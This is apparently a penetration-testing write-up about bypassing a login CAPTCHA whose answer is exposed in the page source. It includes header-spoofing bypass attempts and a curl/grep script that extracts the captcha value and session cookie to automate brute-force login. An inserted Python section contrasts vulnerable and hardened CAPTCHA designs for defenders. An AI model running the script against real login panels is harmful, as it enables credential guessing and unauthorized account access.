Exposed Key In Page Source Led To Bypass Captcha


Muhanad Israiwi

CAPTCHA (Completely Automated Public Turing test to tell Computers and Humans Apart) is a type of security measure known as challenge-response authentication. CAPTCHA helps protect you from spam and password guessing by asking you to complete a simple test that proves you are human and not a computer trying to break into a password-protected account.
A CAPTCHA test is made up of two simple parts: a randomly generated sequence of letters and/or numbers that appears as a distorted image, and a text box. To pass the test and prove you are human, simply type the characters you see in the image into the text box.

CAPTCHA is used for security primarily to distinguish between human users and automated bots:

1. Bot Prevention: CAPTCHA helps prevent automated bots from carrying out tasks that are meant for human users, such as creating accounts, submitting forms, or conducting transactions.

2. Spam Protection: CAPTCHA is commonly used to prevent spam bots from flooding websites with unwanted content, such as spam comments, messages, or emails.

I was doing penetration testing on an employee panel and noticed a CAPTCHA in the form of an image whose value I had to enter along with the username and password.

So I started testing to find a way to bypass this CAPTCHA.

I tried bypassing it using common methods, such as:

1. Changing the request method, for example POST to GET.

Original request:

POST / HTTP/1.1
Host: target.com

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

Change the method to GET:

GET /?_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123 HTTP/1.1
Host: target.com

2. Try removing the value of the captcha parameter:

POST / HTTP/1.1
Host: target.com

_RequestVerificationToken=&_Username=daffa&_Password=test123

3. Try reusing an old captcha token.

4. Try custom headers to bypass the captcha:

X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1

But sadly, nothing worked.

Then I noticed something: the image key (value) is in the page source.

So, I got an idea :)

1. Send a request to the page https://panel.site.com/MyAccount/Login.aspx.

2. Grep the key, which always comes right after the endpoint ghcaptcha.ashx, then use it in the request to bypass the captcha.

Note: when I tried to use the same key with other requests it did not work, so I figured out that I have to use one unique key with every request :(

So what I mean here: let's say we send a curl command and get the captcha value from the source code:

Captcha_Value=11111111
Cookie: ASP.NET_SessionId=000000000

Now when I send another curl request with the same Captcha_Value=11111111, it does not work; it returns:

You entered wrong code.

Since we know all of this, it's time to write a script.

I will send a curl request to the login panel endpoint and grep the key value together with the ASP.NET_SessionId (since, as we saw, a Captcha_Value cannot be used with a different session).

To grep the captcha:

This command first uses grep to select the lines containing the string "ghcaptcha.ashx", case-insensitively (-i). Then the second grep, with the -o option, prints only the runs of digits ([0-9]\+) found on those lines.

curl -s https://panel.site.com/MyAccount/Login.aspx | grep -i "ghcaptcha.ashx" | grep -o '[0-9]\+'

2. Now that we know how things work, we need to grep not only the Captcha_Value but also the ASP.NET_SessionId, so that they work together.

Description:

1. curl -s -D - https://panel.site.com/MyAccount/Login.aspx > response.txt fetches the page and, because of -D -, writes the response headers to standard output ahead of the body, so headers and body both land in response.txt.

2. ghcaptcha=$(...) extracts the number value from the ghcaptcha.ashx URL in the page. An awk equivalent: awk '/ghcaptcha\.ashx/ {match($0, /[0-9]+/); print substr($0, RSTART, RLENGTH)}' response.txt

3. session_id=$(...) extracts the ASP.NET_SessionId value from the Set-Cookie header. An awk equivalent: awk -F'[=;]' '/Set-Cookie: ASP.NET_SessionId=/ {print $2}' response.txt

4. The final curl sends the login POST with the session cookie and the extracted captcha value in txtCode. curl computes Content-Length itself from the body, so no Content-Length header is set by hand.

curl -s -D - https://panel.site.com/MyAccount/Login.aspx > response.txt
ghcaptcha=$(grep -i "ghcaptcha.ashx" response.txt | grep -o '[0-9]\+')
session_id=$(grep -i "ASP.NET_SessionId" response.txt | grep -oE "ASP.NET_SessionId=[^;]+" | cut -d '=' -f 2)

curl -i -s -k -X POST \
-H 'Host: panel.site.com' -H 'Sec-Ch-Ua: "Chromium";v="121", "Not A(Brand";v="99"' -H 'Sec-Ch-Ua-Mobile: ?0' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36' -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'Cache-Control: no-cache' -H 'X-Requested-With: XMLHttpRequest' -H 'X-Microsoftajax: Delta=true' -H 'Sec-Ch-Ua-Platform: "Linux"' -H 'Accept: */*' -H 'Origin: https://panel.site.com' -H 'Sec-Fetch-Site: same-origin' -H 'Sec-Fetch-Mode: cors' -H 'Sec-Fetch-Dest: empty' -H 'Referer: https://panel.site.com/MyAccount/Login.aspx' -H 'Accept-Encoding: gzip, deflate, br' -H 'Accept-Language: en-US,en;q=0.9' -H 'Priority: u=1, i' \
-b "ASP.NET_SessionId=$session_id" \
--data-binary "ctl00%24ToolkitScriptManager1=ctl00%24MainContent%24ucLogin%24upLogin%7Cctl00%24MainContent%24ucLogin%24LoginUser%24LoginButton&ToolkitScriptManager1_HiddenField=&__EVENTTARGET=&__EVENTARGUMENT=&ctl00%24MainContent%24ucLogin%24hdnLoginAttemptCounter=0&ctl00%24MainContent%24ucLogin%24LoginUser%24UserName=alex&ctl00%24MainContent%24ucLogin%24LoginUser%24Password=asasd&ctl00%24MainContent%24ucLogin%24LoginUser%24txtCode=${ghcaptcha}&__ASYNCPOST=true&ctl00%24MainContent%24ucLogin%24LoginUser%24LoginButton=Login" \
'https://panel.site.com/MyAccount/Login.aspx'
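The root cause above is that the value the server expects in txtCode is the same number it prints into the ghcaptcha.ashx image URL, so the page source answers its own challenge. The following is an added example, not the target application's code and not the author's, that models the two designs side by side: the vulnerable pattern (answer embedded in the image URL) and a hardened one where the page only carries an opaque challenge id while the answer stays server-side, bound to the session and consumed on first use. All names (CaptchaStore, render_vulnerable_login, render_hardened_login, the /ghcaptcha.ashx path and the ASP.NET-style session id) are illustrative assumptions.

```python
"""Constructed example (not the target application's code): why embedding the
CAPTCHA answer in the page leaks it, and what a server-side, single-use,
session-bound challenge looks like instead. All names are illustrative."""

import hmac
import secrets
import string
from dataclasses import dataclass, field
from typing import Optional, Tuple

CODE_LEN = 8  # the writeup shows an 8-digit value


def make_code() -> str:
    """Random numeric code of CODE_LEN digits."""
    return "".join(secrets.choice(string.digits) for _ in range(CODE_LEN))


# --- Vulnerable pattern: the image URL carries the expected answer ----------

def render_vulnerable_login(session: dict) -> str:
    """Stores the code in the session, but also puts it in the image URL, so
    the 'challenge' can be read straight out of the HTML without the image."""
    code = make_code()
    session["captcha_code"] = code
    return (f'<img src="/ghcaptcha.ashx?{code}">'
            '<input name="txtCode">')


def verify_vulnerable(session: dict, submitted: str) -> bool:
    """Checks the submitted code against the session copy (constant-time)."""
    return hmac.compare_digest(session.get("captcha_code", ""), submitted)


def digits_after_marker(html: str, marker: str = "ghcaptcha.ashx?") -> Optional[str]:
    """The writeup's grep as a function: the digits right after the marker.
    Used here only to show what a page does or does not reveal."""
    i = html.find(marker)
    if i == -1:
        return None
    j = i + len(marker)
    k = j
    while k < len(html) and html[k].isdigit():
        k += 1
    return html[j:k] or None


# --- Hardened pattern: opaque id in the page, answer only on the server -----

@dataclass
class CaptchaStore:
    """Opaque challenge id -> {session id, answer}. In production this would
    be a cache or database with a short TTL; a dict is enough to show the logic."""
    entries: dict = field(default_factory=dict)

    def issue(self, session_id: str) -> Tuple[str, str]:
        challenge_id = secrets.token_urlsafe(16)
        answer = make_code()
        self.entries[challenge_id] = {"sid": session_id, "answer": answer}
        return challenge_id, answer  # the answer goes only to the image renderer

    def verify(self, session_id: str, challenge_id: str, submitted: str) -> bool:
        # Consume on first use, pass or fail: a replayed id never verifies again.
        entry = self.entries.pop(challenge_id, None)
        if entry is None:
            return False
        # Bind the challenge to the session that received it.
        if entry["sid"] != session_id:
            return False
        return hmac.compare_digest(entry["answer"], submitted)


def render_hardened_login(store: CaptchaStore, session_id: str) -> str:
    """Only the opaque id reaches the client; /ghcaptcha.ashx?id=... would
    look the answer up server-side and draw the image for that id."""
    challenge_id, _answer = store.issue(session_id)
    return (f'<img src="/ghcaptcha.ashx?id={challenge_id}">'
            f'<input type="hidden" name="captcha_id" value="{challenge_id}">'
            '<input name="txtCode">')


if __name__ == "__main__":
    sess: dict = {}
    page = render_vulnerable_login(sess)
    print("vulnerable page leaks the answer:",
          digits_after_marker(page) == sess["captcha_code"])

    store = CaptchaStore()
    page = render_hardened_login(store, "sess-A")
    print("hardened page leaks digits:", digits_after_marker(page))
```

The hardened store reproduces the one property the target did get right (a key works only with the session it was issued to) and adds the two it lacked: the answer never appears in anything sent to the browser, and each challenge id is spent on its first verification attempt, whether or not the attempt succeeds.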

This is a screenshot from the penetration testing report, where I made a list of usernames and passwords and, using the curl command, bypassed the CAPTCHA and performed a brute-force attack.

Thanks for Reading.
